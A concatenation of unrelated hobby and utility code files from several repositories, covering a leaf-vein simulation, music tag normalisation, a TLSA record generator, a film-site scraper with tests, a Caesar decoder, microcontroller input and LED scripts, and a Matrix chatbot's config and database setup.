#print(auxin_vein_dists.shape)
#print(np.array(auxin_min_dists).shape)
#print(auxin_min_dists)
#print(nns[i])
#print(len(sample_auxin))
nearest_auxin = np.argmin([auxin_vein_dists[i][k] for k in nns[i]])
#now construct the step vector
if weighted_stepsizes:
step_vec = tangent_vector(pt_list[i],sample_auxin[nns[i][nearest_auxin]],normalized = True)
vprime = exp_map(pt_list[i],[D_step*step_vec[0],D_step*step_vec[1]])
else:
step_vec = tangent_vector(pt_list[i],sample_auxin[nns[i][nearest_auxin]],normalized = False)
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
#if the new point is far enough away from the fovea:
if np.linalg.norm(vprime[1]*vprime[0] - np.array([0.,0.,-1.])) > fovea_radius:
#print("growing from {} to {}".format(pt_list[i],vprime))
#add the new point to the list of points
pt_list = np.vstack([pt_list,vprime])
#change the old grow indicator to 0
to_grow_indicator[i] = 0
#change the new grow indicator to 1
to_grow_indicator = np.append(to_grow_indicator,1)
#add branch information for this new branch
branch_membership.append([branch_membership[i][-1]])
branches[branch_membership[i][-1]].append(len(to_grow_indicator)-1)
#update distance array
dists = np.array([geodesic_dist(vprime,s) for s in sample_auxin])
#print("distances to auxin for vprime are: {}".format(dists))
#set up auxin-vein node distance chart
auxin_vein_dists = np.vstack([auxin_vein_dists,dists])
#update min distances
for j in range(len(sample_auxin))[::-1]:
if dists[j] < auxin_min_dists[j][1]:
#update the min distance array
#sample_auxin = np.delete(sample_auxin,j,0)
auxin_min_dists[j][1] = dists[j]
auxin_min_dists[j][0] = len(to_grow_indicator)-1
#prune auxin nodes
for j in range(len(sample_auxin))[::-1]:
#first check whether or not the new point got close enough to an auxin node
#print(dists)
if auxin_min_dists[j][1] < death_dist:
#delete auxin
sample_auxin = np.delete(sample_auxin,j,0)
auxin_vein_dists = np.delete(auxin_vein_dists,j,1)
auxin_min_dists = np.delete(auxin_min_dists,j,0)
#print("to grow indicator is: \n"); print(to_grow_indicator)
#print("new point dists are: \n");print(auxin_vein_dists)
#print("new point dists are: \n");print(auxin_min_dists)
if save_time_data:
time_data.append([pt_list,list(branches),list(branch_membership)])
#loop ends once no auxin nodes are left or max_iter has been exceeded
if save_time_data:
return np.array(pt_list), branches, branch_membership, init_sample,time_data
else:
return np.array(pt_list), branches, branch_membership, init_sample
def convert_from_product(pt_list):
new_pts = []
for pt in pt_list:
new_pts.append(pt[1]*np.array(pt[0]))
return np.array(new_pts)
def get_vein_radii(num_pts, branches,init_radii = 0.05,branch_power = 3.):
vein_radii = np.zeros(num_pts)
for br in branches[::-1]:
if len(br) > 0:
vein_radii[br[-1]] = init_radii
for br_idx in range(2,len(br)+1):
vein_radii[br[-br_idx]] = np.power(vein_radii[br[-br_idx]]**(branch_power) + vein_radii[br[-br_idx+1]]**(branch_power),1./branch_power)
return vein_radii
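# Hedged usage sketch of get_vein_radii (the example values below are illustrative only):
# with two child branches meeting at node 0, branches = [[0, 1], [0, 2]] and num_pts = 3,
# radii combine at the junction via r_parent**3 = sum(r_child**3) (Murray's law, branch_power = 3),
# so get_vein_radii(3, [[0, 1], [0, 2]]) gives 0.05 for nodes 1 and 2
# and roughly 0.05 * 2**(1./3.) ~= 0.063 for the shared parent node 0.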
def sim_to_image(pts, branches,vein_radii,dpi = 500,figsize = (6,6),draw_circle = False,c_circle = [0.0,0.0],r_circle = 1.):
fig, ax = plt.subplots(1,1,figsize = figsize,dpi = dpi)
for br in branches:
#isolate the branch pieces below the xy axes
if len(br)>0:
local_br = np.array(br)[pts[br,2]<0.05]
ax.plot(pts[local_br,0],pts[local_br,1],c="k",linewidth = np.mean(vein_radii[local_br]))
#rescale everything
ax.set_xlim([-1.2,1.2])
ax.set_ylim([-1.2,1.2])
#take away boundary buffers?
ax.axis('off')
if draw_circle:
plot_pts = np.array([[r_circle*np.cos(t)+c_circle[0],r_circle*np.sin(t)+c_circle[1]] for t in np.linspace(-np.pi,np.pi,100)])
ax.plot(plot_pts[:,0],plot_pts[:,1])
return fig, ax
#from https://stackoverflow.com/questions/7821518/matplotlib-save-plot-to-numpy-array
def fig_to_img(fig, ax):
fig.add_axes(ax)
fig.canvas.draw()
# this rasterized the figure
X = np.array(fig.canvas.renderer._renderer)
X = 0.2989*X[:,:,0] + 0.5870*X[:,:,1] + 0.1140*X[:,:,2]
plt.close("all")
return X
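# Hedged usage sketch chaining sim_to_image and fig_to_img (assumes a rasterizing Agg-style
# matplotlib backend so fig.canvas.renderer is available):
# fig, ax = sim_to_image(pts, branches, vein_radii)
# gray = fig_to_img(fig, ax)  # 2-D numpy array of luminance values, one per rendered pixel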
def restrict_branches(pts,branches,branch_membership,max_height = -0.1):
pt_birth_times = np.zeros(len(pts))
pt_birth_times[0] = 1.
for br in branches:
for i in range(1,len(br)):
if pts[br[i]][-1] > max_height:
pt_birth_times[br[i]] = np.inf
else:
pt_birth_times[br[i]] = pt_birth_times[br[i-1]] + 1
#prune for points with birth times < infinity
new_branches = [[] for br in branches]
new_branch_membership = [[] for pt in pts]
for i in range(len(new_branches)):
for br_pt in branches[i]:
if pt_birth_times[br_pt] < np.inf:
new_branches[i].append(br_pt)
new_branch_membership[br_pt].append(i)
else:
break
return new_branches, new_branch_membership
#new_branches, new_branch_membership = restrict_branches(pts,pt_idx,branches,branch_membership)
def write_sim_data(pts,branches,branch_membership,file_path,file_name):
f = open("{}{}_points.dat".format(file_path,file_name),"w")
for pt in pts:
for coord in pt:
f.write("{:.5f},".format(coord))
f.write("\n")
f.close()
f = open("{}{}_branches.dat".format(file_path,file_name),"w")
for br in branches:
for b in br:
f.write("{},".format(b))
f.write("\n")
f.close()
f = open("{}{}_branch_membership.dat".format(file_path,file_name),"w")
for br in branch_membership:
for b in br:
f.write("{},".format(coord))
f.write("\n")
f.close()
return
def heat_signature(pts, branches,t=1.,num_eigs = 3,save_plot = True):
#initial condition/constants come from integrating bessel functions along branches
#get plot points
r_vals = 0.5*(np.cos(np.linspace(0.,np.pi,20))+1.)
theta_vals = np.linspace(0.,2.*np.pi,100)
#sort eig_vals, get corresponding eig_fns
eig_vals = np.array([ spspec.jn_zeros(eigfn_idx,10) for eigfn_idx in range(num_eigs)])
eig_val_pairs = np.array([ (spspec.jn_zeros(eigfn_idx,10),eigfn_idx) for eigfn_idx in range(num_eigs)])
eig_val_sort_order = np.argsort(eig_vals.ravel())
eig_val_pairs_sorted = eig_val_pairs.ravel()[eig_val_sort_order]
R,THETA = np.meshgrid(r_vals,theta_vals)
X = R*np.cos(THETA)
Y = R*np.sin(THETA)
heat_kernel_consts = []
for i in range(num_eigs):
e_val, e_idx = eig_val_pairs_sorted[i]
kth_eigfn1 = lambda x: spspec.jv(e_idx,e_val*np.linalg.norm(x))*np.cos(e_idx*np.angle(x[0]+1.j*x[1]))
kth_eigfn1_polar = lambda r,theta: spspec.jv(e_idx,e_val*r)*np.cos(e_idx*theta)
#kth_eigfn2 = lambda x: spspec.jv(e_idx,e_val*np.linalg.norm(x))*np.sin(e_idx*np.angle(x[0]+1.j*x[1]))
total_integral = 0.
for br in branches:
total_integral += sum([spint.quad(lambda t: kth_eigfn1(pts[br[ii]]*(1.-t) + pts[br[ii+1]]*t),0,1)[0] for ii in range(len(br)-1)])
heat_kernel_consts.append(total_integral)
heat_kernel = lambda r,theta: sum([heat_kernel_consts[eig_idx]*np.exp(-eig_val_pairs_sorted[eig_idx][0]*t)*spspec.jv(eig_val_pairs_sorted[eig_idx][1],eig_val_pairs_sorted[eig_idx][0]*r)*np.cos(eig_val_pairs_sorted[eig_idx][1]*theta) for eig_idx in range(num_eigs)])
Z = [[heat_kernel(r,theta) for r in r_vals] for theta in theta_vals]
Z = np.array(Z)
if save_plot:
level_bound = np.max([np.abs(np.min(Z)),np.max(Z)])
levels = np.linspace(-level_bound,level_bound,50)
norm = cm.colors.Normalize(vmax=abs(Z).max(), vmin=-abs(Z).max())
cmap = cm.bwr
fig, ax = plt.subplots(1,1)
CS = ax.contourf(X, Y, Z,levels,alpha = 0.9,norm=norm,cmap = cm.get_cmap(cmap,len(levels)-1))
fig.colorbar(CS,ax=ax)
plt.show()
return (X,Y), Z
``` |
{
"source": "jqueuniet/admin_tools",
"score": 2
} |
#### File: admin_tools/music/normalize.py
```python
import os, re
from unicodedata import normalize
from mutagen.easyid3 import EasyID3
from mutagen.oggvorbis import OggVorbis
from mutagen.mp4 import MP4
FORMAT_SINGLE = '{0:02} {1}{2}'
FORMAT_MULTI = '{0}-{1:02} {2}{3}'
FORMAT_NOTRACK = '{0}{1}'
FORBIDDEN_CHARS = dict.fromkeys(map(ord, '/\\?%:*"!|><+\x00'), None)
#FORBIDDEN_CHARS = '/\\?%:*"!|><+\x00'
STRIPSPACES = re.compile(r'\s{2,}')
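# Hedged illustration of the two cleanup helpers above:
# 'Live!?'.translate(FORBIDDEN_CHARS) drops every character listed in FORBIDDEN_CHARS -> 'Live'
# STRIPSPACES.sub(' ', 'a  b   c') collapses runs of whitespace to single spaces -> 'a b c'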
def rename_songs():
files = os.listdir('.')
files.sort()
for filename in files:
(sn, ext) = os.path.splitext(filename)
dirty = False
if ext.lower() == '.ogg':
meta = OggVorbis(filename)
elif ext.lower() == '.mp3':
meta = EasyID3(filename)
elif ext.lower() in ('.mp4', '.m4a'):
meta = MP4(filename)
if '----:com.apple.iTunes:iTunNORM' in meta:
del meta['----:com.apple.iTunes:iTunNORM']
dirty = True
if '----:com.apple.iTunes:iTunSMPB' in meta:
del meta['----:com.apple.iTunes:iTunSMPB']
dirty = True
if dirty:
meta.save()
if 'disk' in meta:
newfilename = (FORMAT_MULTI.format(meta['disk'][0][0],
meta['trkn'][0][0], meta['\xa9nam'][0], ext))
else:
newfilename = (FORMAT_SINGLE.format(meta['trkn'][0][0],
meta['\xa9nam'][0], ext))
newfilename = newfilename.translate(FORBIDDEN_CHARS)
newfilename = STRIPSPACES.sub(' ', newfilename)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
continue
else:
if filename not in ('.', '..') and os.path.isdir(filename):
os.chdir(filename)
rename_songs()
os.chdir('..')
uf = filename
newfilename = normalize('NFC', uf)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
continue
if 'discnumber' in meta and len(meta['discnumber'][0]) > 1:
olddn = meta['discnumber'][0]
newdn = meta['discnumber'][0][0]
meta['discnumber'] = newdn
print('{0} shortened to {1}'.format(olddn, newdn))
dirty = True
if 'tracknumber' in meta and not meta['tracknumber'][0].find('/') == -1:
oldtn = meta['tracknumber'][0]
newtn = meta['tracknumber'][0][:meta['tracknumber'][0].find('/')]
meta['tracknumber'] = newtn
print('{0} shortened to {1}'.format(oldtn, newtn))
dirty = True
if dirty:
meta.save()
if 'discnumber' in meta:
newfilename = (FORMAT_MULTI.format(int(meta['discnumber'][0]),
int(meta['tracknumber'][0]), meta['title'][0], ext.lower()))
elif 'tracknumber' in meta:
newfilename = (FORMAT_SINGLE.format(int(meta['tracknumber'][0]),
meta['title'][0], ext.lower()))
else:
try:
newfilename = (FORMAT_NOTRACK.format(meta['title'][0], ext.lower()))
except KeyError:
print('defective file: {0}'.format(filename))
continue
#newfilename = newfilename.translate(None, FORBIDDEN_CHARS)
newfilename = newfilename.translate(FORBIDDEN_CHARS)
newfilename = STRIPSPACES.sub(' ', newfilename)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
if __name__ == '__main__':
rename_songs()
```
#### File: admin_tools/tls/create_tlsa.py
```python
import os, sys, hashlib, argparse
from pyasn1_modules import pem, rfc2459
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import OctetString
def parse_certificate(certificate_path):
fqdns = set()
substrate = pem.readPemFromFile(open(certificate_path))
cert = decoder.decode(substrate, asn1Spec=rfc2459.Certificate())[0]
core = cert['tbsCertificate']
# Hash public key
der = encoder.encode(core.getComponentByName('subjectPublicKeyInfo'))
hash_der = hashlib.sha256()
hash_der.update(der)
pkhash = hash_der.hexdigest()
# Extract CommonName
for rdnss in core['subject']:
for rdns in rdnss:
for name in rdns:
if name.getComponentByName('type') == rfc2459.id_at_commonName:
value = decoder.decode(name.getComponentByName('value'), asn1Spec=rfc2459.DirectoryString())[0]
fqdns.add(str(value.getComponent()))
# Extract SubjectAltName
for extension in core['extensions']:
if extension['extnID'] == rfc2459.id_ce_subjectAltName:
octet_string = decoder.decode(extension.getComponentByName('extnValue'), asn1Spec=OctetString())[0]
(san_list, r) = decoder.decode(octet_string, rfc2459.SubjectAltName())
for san_struct in san_list:
if san_struct.getName() == 'dNSName':
fqdns.add(str(san_struct.getComponent()))
return (pkhash, fqdns)
def create_tlsa(certificate_path, stream, port):
(pkhash, fqdns) = parse_certificate(certificate_path)
for fqdn in fqdns:
print('_{}._{}.{} IN TLSA 3 1 1 {}'.format(port, stream, fqdn, pkhash))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('certificate', help='path to certificate')
parser.add_argument('stream', nargs='?', default='tcp', help='stream type (eg: tcp, udp), default to tcp')
parser.add_argument('port', nargs='?', default='443', help='network port, default to 443')
args = parser.parse_args()
create_tlsa(args.certificate, args.stream, args.port)
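# Hedged usage sketch (the certificate path below is illustrative):
#   python create_tlsa.py /etc/ssl/certs/example.pem tcp 443
# prints one DANE record per FQDN found in the certificate's CN/SAN, shaped like:
#   _443._tcp.example.org IN TLSA 3 1 1 <sha256 of the subjectPublicKeyInfo>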
``` |
{
"source": "jqueuniet/senscritiquescraper",
"score": 3
} |
#### File: utils/row_utils/videogames_utils.py
```python
import logging
from . import row_utils
from bs4 import element
from typing import List, Dict
logger = logging.getLogger(__name__)
def get_videogames_infos_from_row(row: element.Tag) -> Dict:
"""Returns a dict containing infos for a videogame row."""
return {
"Rank": row_utils.get_rank(row),
"Title": row_utils.get_title(row),
"URL": row_utils.get_url(row),
"Original Title": row_utils.get_original_title(row),
"Year": row_utils.get_year(row),
"Release Date": row_utils.get_baseline_0(row),
"Picture URL": row_utils.get_picture_url(row),
"Genre": row_utils.get_baseline_1(row),
"Developer": row_utils.get_producer(row),
"Platforms": row_utils.get_platforms(row),
"Description": row_utils.get_description(row),
"Average Rating": row_utils.get_average_rating(row),
"Number of Ratings": row_utils.get_number_of_ratings(row),
}
def get_order_videogames_columns() -> List:
"""Returns the order of columns for videogames rows."""
return [
"Rank",
"Title",
"Developer",
"Platforms",
"Average Rating",
"Number of Ratings",
"URL",
"Original Title",
"Year",
"Release Date",
"Picture URL",
"Genre",
"Description",
]
```
#### File: senscritiquescraper/utils/search_utils.py
```python
import logging
from bs4 import BeautifulSoup
from typing import Optional
import urllib.parse
logger = logging.getLogger(__name__)
GENRE_CHOICES = ["Morceaux", "Albums", "Films", "Livres", "Séries", "BD", "Jeux"]
def sanitize_text(text: str) -> str:
"""Sanitize text to URL-compatible text."""
return urllib.parse.quote_plus(text)
def get_search_url(search_term: str, genre: Optional[str] = None) -> str:
"""Returns the senscritique search URL for a search term."""
search_term_sanitized = sanitize_text(search_term)
if genre not in GENRE_CHOICES:
url = f"https://www.senscritique.com/search?q={search_term_sanitized}"
else:
url = f"https://www.senscritique.com/search?q={search_term_sanitized}&categories[0][0]={genre}"
return url
def get_search_result(soup: BeautifulSoup, position: int) -> Optional[str]:
"""Returns the URL result of the BeautifulSoup object at the defined position."""
try:
url_list = [
x.find_all("a")[1]["href"]
for x in soup.find_all(
"div", {"class": "ProductListItem__Container-sc-1ci68b-0"}
)
]
if position > len(url_list):
logger.error(
f"Desired result not found in search results (Desired result: position {position}, number of search results: {len(url_list)})."
)
return None
return url_list[position - 1]
except Exception as e:
logger.error(e)
return None
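# Hedged usage sketch of the URL builder above (result shape follows get_search_url's f-strings):
# get_search_url("dune", genre="Livres")
# -> "https://www.senscritique.com/search?q=dune&categories[0][0]=Livres"
# get_search_url("dune") falls back to the plain query form without the categories parameter.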
```
#### File: tests/tests_survey/test_survey_comic.py
```python
from senscritiquescraper.utils import survey_utils
def test_get_category_from_survey(survey_comic):
assert survey_utils.get_category_from_survey(survey_comic) == "bd"
def test_get_rows_from_survey(survey_comic):
rows = survey_utils.get_rows_from_survey(survey_comic)
assert len(rows) == 10
def test_get_infos_from_survey(survey_comic):
category = survey_utils.get_category_from_survey(survey_comic)
infos = survey_utils.get_survey_infos(survey_comic, category)
assert len(infos) == 10
assert infos[0]["Title"] == "Astérix et Cléopâtre - Astérix, tome 6"
```
#### File: tests/tests_top/test_topchart_movie.py
```python
from senscritiquescraper.utils.row_utils import row_utils
def test_movie_rank(topchart_row_movie):
rank = row_utils.get_rank(topchart_row_movie)
assert rank == "1"
def test_movie_title(topchart_row_movie):
title = row_utils.get_title(topchart_row_movie)
assert title == "Fight Club"
def test_movie_url(topchart_row_movie):
url = row_utils.get_url(topchart_row_movie)
assert url.startswith("https")
def test_movie_original_title(topchart_row_movie):
original_title = row_utils.get_original_title(topchart_row_movie)
assert not original_title
def test_movie_year(topchart_row_movie):
year = row_utils.get_year(topchart_row_movie)
assert year == "1999"
def test_movie_release_date(topchart_row_movie):
release_date = row_utils.get_baseline_1(topchart_row_movie)
assert release_date == "10 novembre 1999 (France)"
def test_movie_length(topchart_row_movie):
length = row_utils.get_baseline_0(topchart_row_movie)
assert length == "2 h 19 min"
def test_movie_cover(topchart_row_movie):
cover_url = row_utils.get_picture_url(topchart_row_movie)
assert cover_url.startswith("https")
def test_movie_genre(topchart_row_movie):
genre = row_utils.get_genre(topchart_row_movie)
assert genre == "Drame"
def test_movie_author(topchart_row_movie):
author = row_utils.get_producer(topchart_row_movie)
assert author == "<NAME>"
def test_movie_description(topchart_row_movie):
description = row_utils.get_description(topchart_row_movie)
# description Fight Club
assert description.startswith("Insomniaque")
def test_movie_average_rating(topchart_row_movie):
average_rating = row_utils.get_average_rating(topchart_row_movie)
assert len(average_rating) == 3
def test_movie_number_ratings(topchart_row_movie):
number_ratings = row_utils.get_number_of_ratings(topchart_row_movie)
assert int(number_ratings) > 160000
```
#### File: tests/tests_work/test_work_jeu.py
```python
def test_get_work_jeu(work_object_jeu):
details = work_object_jeu.get_details()
assert isinstance(details, dict)
assert len(details) == 17
def test_rating_work_jeu(work_object_jeu):
main_rating = work_object_jeu.get_main_rating()
assert isinstance(main_rating, str)
assert main_rating == "6.5"
def test_rating_details_work_jeu(work_object_jeu):
rating_details = work_object_jeu.get_rating_details()
assert isinstance(rating_details, dict)
assert len(rating_details) == 10
def test_title_work_jeu(work_object_jeu):
title = work_object_jeu.get_title()
assert title == "Verdun"
def test_year_work_jeu(work_object_jeu):
year = work_object_jeu.get_year()
assert year == "2013"
def test_cover_url_work_jeu(work_object_jeu):
cover_url = work_object_jeu.get_cover_url()
assert isinstance(cover_url, str)
assert (
cover_url == "https://media.senscritique.com/media/000019964116/160/Verdun.jpg"
)
def test_complementary_infos_work_jeu(work_object_jeu):
complementary_infos = work_object_jeu.get_complementary_infos()
assert isinstance(complementary_infos, dict)
def test_review_count_work_jeu(work_object_jeu):
review_count = work_object_jeu.get_review_count()
assert isinstance(review_count, str)
def test_vote_count_work_jeu(work_object_jeu):
vote_count = work_object_jeu.get_vote_count()
assert isinstance(vote_count, str)
def test_favorite_count_work_jeu(work_object_jeu):
favorite_count = work_object_jeu.get_favorite_count()
assert isinstance(favorite_count, str)
def test_wishlist_count_work_jeu(work_object_jeu):
wishlist_count = work_object_jeu.get_wishlist_count()
assert isinstance(wishlist_count, str)
def test_in_progress_count_work_jeu(work_object_jeu):
in_progress_count = work_object_jeu.get_in_progress_count()
assert isinstance(in_progress_count, str)
``` |
{
"source": "jquintus/PiProject",
"score": 2
} |
#### File: Feather/funWithRotaryEncoders/code.py
```python
import adafruit_ble
from adafruit_ble.advertising import Advertisement
from adafruit_ble.advertising.standard import ProvideServicesAdvertisement
from adafruit_ble.services.standard.hid import HIDService
from adafruit_ble.services.standard.device_info import DeviceInfoService
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import rotaryio
import board
import digitalio
"""
HARDWARE
Board: Metro Express
Rotary encoder
clk -> D11
dt -> D10
sw -> D9
+ -> 5v
grnd -> grnd
STEMMA Wired Tactile Push-Button Pack
Red Button -> GRND & D8
Black Button -> GRND & D7
"""
print("finished imports")
VOLUME_UP = 0x80
VOLUME_DOWN = 0x81
hid = HIDService()
device_info = DeviceInfoService(software_revision=adafruit_ble.__version__,
manufacturer="Adafruit Industries")
advertisement = ProvideServicesAdvertisement(hid)
advertisement.appearance = 961
scan_response = Advertisement()
scan_response.complete_name = "TEST CircuitPython HID"
ble = adafruit_ble.BLERadio()
if not ble.connected:
print("advertising")
ble.start_advertising(advertisement, scan_response)
else:
print("already connected")
print(ble.connections)
k = Keyboard(hid.devices)
kl = KeyboardLayoutUS(k)
encoder = rotaryio.IncrementalEncoder(board.A1, board.A2)
last_position = encoder.position
def volume_up(delta):
for _ in range(delta):
print("Going up")
k.send(VOLUME_UP)
def volume_down(delta):
for _ in range(-1 * delta):
print("going down")
k.send(VOLUME_DOWN)
print("Finished setup")
while True:
current_position = encoder.position
position_change = current_position - last_position
if position_change > 0:
volume_up(position_change)
print(current_position)
elif position_change < 0:
volume_down(position_change)
print(current_position)
last_position = current_position
```
#### File: piboard/client/Encoder.py
```python
import RPi.GPIO as GPIO
class Encoder:
def __init__(self, a_pin, a_cmd, b_pin, b_cmd, noop):
self.a_pin = a_pin
self.a_cmd = a_cmd
self.b_pin = b_pin
self.b_cmd = b_cmd
self.noop = noop
self.old_a = True
self.old_b = True
def setup(self):
GPIO.setup(self.a_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.b_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def get_encoder_turn(self):
# return -1, 0, or +1
result = 0
self.new_a = GPIO.input(self.a_pin)
self.new_b = GPIO.input(self.b_pin)
if self.new_a != self.old_a or self.new_b != self.old_b:
if self.old_a == 0 and self.new_a == 1:
result = (self.old_b * 2 - 1)
elif self.old_b == 0 and self.new_b == 1:
result = -(self.old_a * 2 - 1)
self.old_a, self.old_b = self.new_a, self.new_b
return result
def get_command(self):
change = self.get_encoder_turn()
if change > 0:
return self.a_cmd
elif change < 0:
return self.b_cmd
else:
return self.noop
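# Hedged usage sketch (BCM pin numbers and command strings below are illustrative only):
# GPIO.setmode(GPIO.BCM)
# encoder = Encoder(17, "volume_up", 27, "volume_down", "noop")
# encoder.setup()
# cmd = encoder.get_command()  # poll frequently enough to catch every quadrature transition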
```
#### File: piboard/client/RgbLed.py
```python
import board
import busio
import digitalio
import adafruit_tlc59711
def create_spi():
spi = busio.SPI(clock=board.SCK, MOSI=board.MOSI)
return spi
class RgbLed:
def __init__(self, spi):
self.spi = spi
self.MAX = 65535
self.MAX_BRIGHT = 127
def setup(self):
self.led = adafruit_tlc59711.TLC59711(self.spi)
def get_command(self):
pass
def red(self, idx):
self.led[idx] = (self.MAX, 0, 0)
def green(self, idx):
self.led[idx] = (0, self.MAX, 0)
def blue(self, idx):
self.led[idx] = (0, 0, self.MAX)
def purple(self, idx):
red = int(self.MAX / 4)
self.led[idx] = (red, 0, self.MAX)
def dim(self):
self.led.red_brightness = 6
self.led.green_brightness = 6
self.led.blue_brightness = 6
```
#### File: PiProject/spikes/sos.py
```python
from gpiozero import LED
from time import sleep
led = LED(24)
timeUnit = 0.1
dotTime = 1 * timeUnit
dashTime = 3 * timeUnit
betweenSymbols = 1 * timeUnit
betweenLetters = 3 * timeUnit
betweenWords = 7 * timeUnit
def dot():
led.on()
sleep(dotTime)
led.off()
def dash():
led.on()
sleep(dashTime)
led.off()
def morse_s():
dot()
sleep(betweenSymbols)
dot()
sleep(betweenSymbols)
dot()
def morse_o():
dash()
sleep(betweenSymbols)
dash()
sleep(betweenSymbols)
dash()
while True:
morse_s()
sleep(betweenLetters)
morse_o()
sleep(betweenLetters)
morse_s()
sleep(betweenWords)
``` |
{
"source": "jquk/cryptography",
"score": 4
} |
#### File: cipher/Caesar-py/cipher-shift-decode.py
```python
import sys
class ClassName(object):
"""docstring for """
def __init__(self, arg):
self.arg = arg
class Cipher_Shift(object):
"""
DEFAULT SHIFT IS 2,
UNLESS ANOTHER SHIFT IS PASSED AS ARGUMENT TO THE SCRIPT
FOR THIS CLASS' CONSTRUCTOR TO TAKE IT IN.
"""
def __init__(self, arg=2):
self.SHIFT_KEY = arg
# INPUT TEXT
#===========
def _get_file_content(self):
fh = open('io/ciphered.txt', 'r')
fc = fh.read()
fh.close()
fc = "".join(fc.split())
print(fc)
return fc
def _save_to_file(self, ciphered):
fh = open("io/de-ciphered.txt", "w")
lines_of_text = ciphered
fh.writelines(lines_of_text)
fh.close()
# GET SHIFT
#==========
def _get_shifted_value(self, letter):
ascii_val_shifted = 0
if self.SHIFT_KEY > 0:
""" check that the result of the operation would be
within the ascii lower case letters range """
# print "ord('a') " + str(ord('a'))
# print "ord('" + str(letter) + "') " + str(ord(letter)) + " - " + str(self.SHIFT_KEY) + " = " + str(ord(letter) - self.SHIFT_KEY) + " = " + str(chr( ord(letter) - self.SHIFT_KEY ))
# print "ord('z') " + str(ord('z')) + "\n"
if ((ord(letter) - self.SHIFT_KEY) > ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
elif ((ord(letter) - self.SHIFT_KEY) == ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
elif ((ord(letter) - self.SHIFT_KEY) < ord('a')):
dist_sk = ord('a') - (ord(letter) - self.SHIFT_KEY)
ascii_val_shifted = ord('z') - dist_sk
# print "\n\tdist_sk " + str(dist_sk) + "\n\tascii_val_shifted " + str(ascii_val_shifted) + "\n\tascii " + chr(ascii_val_shifted)
elif self.SHIFT_KEY == 0:
ascii_val_shifted = ord(letter)
elif self.SHIFT_KEY < 0:
if ((ord(letter) + self.SHIFT_KEY) < ord('a')):
dist_sk = ord('a') - (ord(letter) - self.SHIFT_KEY) - 1
ascii_val_shifted = ord('z') - dist_sk
elif ((ord(letter) + self.SHIFT_KEY) == ord('a')):
ascii_val_shifted = ord('a')
elif ((ord(letter) + self.SHIFT_KEY) > ord('a')):
ascii_val_shifted = ord(letter) - self.SHIFT_KEY
return ascii_val_shifted
# GET ASCII FOR EVERY LETTER AND SHIFT
#=====================================
def _get_ascii_and_shift(self, fc):
fc_ascii = ''
fc_ascii_shifted = ''
fc_ascii_shifted_converted = ''
for letter in fc:
ascii_val = ord(letter)
fc_ascii = str(fc_ascii) + str(ord(letter))
# print(fc_ascii)
""" SHIFT """
ascii_val_shifted = self._get_shifted_value(letter)
fc_ascii_shifted = str(fc_ascii) + str(ascii_val_shifted)
# print(fc_ascii_shifted)
char_val_shifted = chr(ascii_val_shifted)
fc_ascii_shifted_converted = fc_ascii_shifted_converted + char_val_shifted
# print(fc_ascii_shifted_converted)
print(fc_ascii_shifted_converted)
return fc_ascii_shifted_converted
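# Hedged worked example of the decode rule above (default SHIFT_KEY of 2):
# 'c' -> ord('c') - 2 == ord('a'), so it decodes to 'a';
# letters that would fall below 'a' wrap back from 'z' using the dist_sk distance computed above.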
if len(sys.argv) > 1:
SHIFT_KEY = int(sys.argv[1])
cipher_shift = Cipher_Shift(SHIFT_KEY)
else:
cipher_shift = Cipher_Shift()
fc = cipher_shift._get_file_content()
ciphered = cipher_shift._get_ascii_and_shift(fc)
cipher_shift._save_to_file(ciphered)
``` |
{
"source": "jquku/Matrix-Chatbot",
"score": 3
} |
#### File: jquku/Matrix-Chatbot/config.py
```python
import os
import yaml
import sys
from typing import List, Any
class Config(object):
def __init__(self, filepath):
# Load in the config file at the given filepath
with open(filepath) as file_stream:
self.config = yaml.safe_load(file_stream.read())
#account setup
self.user_id = self.get_config(["matrix", "user_id"], required=True)
self.user_password = self.get_config(["matrix", "user_password"], required=True)
self.homeserver_url = self.get_config(["matrix", "homeserver_url"], required=True)
#database setup
self.name = self.get_config(["database", "name"], required=True)
self.user = self.get_config(["database", "user"], required=True)
self.password = self.get_config(["database", "password"], required=True)
self.host = self.get_config(["database", "host"], required=True)
self.port = self.get_config(["database", "port"], required=True)
def get_config(
self,
path: List[str],
default: Any = None,
required: bool = True,
) -> Any:
#get fitting option, falling back to `default` or raising when a required key is missing
config = self.config
for name in path:
config = config.get(name)
if config is None:
if required:
raise KeyError("Required config option '{}' is missing".format(".".join(path)))
return default
return config
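# Hedged sketch of the YAML layout this class expects (all values are placeholders):
# matrix:
#   user_id: "@bot:example.org"
#   user_password: "<password>"
#   homeserver_url: "https://matrix.example.org"
# database:
#   name: "chatbot"
#   user: "chatbot"
#   password: "<password>"
#   host: "localhost"
#   port: 5432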
```
#### File: Matrix-Chatbot/models/database.py
```python
import psycopg2
import sys
sys.path.append("./../")
from services.database_service import connect_to_database
'''creating all the database tables based on sql commands'''
def create_tables():
'''creates all the database tables'''
connection = connect_to_database() #initialize db connection
#create tables via sql commands
cursor = connection.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS domain_description (id SERIAL PRIMARY KEY, name VARCHAR(255), original VARCHAR(255), source VARCHAR(255), satisfaction integer, feedback_given integer)")
cursor.execute("CREATE TABLE IF NOT EXISTS user_client (id SERIAL PRIMARY KEY, name text, last_module integer, links_preferred integer, stats_preferred integer, links_counter integer, language VARCHAR(255), FOREIGN KEY (last_module) REFERENCES domain_description(id))")
cursor.execute("CREATE TABLE IF NOT EXISTS statistics (id SERIAL PRIMARY KEY, domain_description_id integer, topic VARCHAR(255), questioned integer, FOREIGN KEY (domain_description_id) REFERENCES domain_description(id) )")
cursor.execute("CREATE TABLE IF NOT EXISTS message (id SERIAL PRIMARY KEY, user_client_id integer, body text, information_extracted text, all_links text, response text, FOREIGN KEY (user_client_id) REFERENCES user_client(id))")
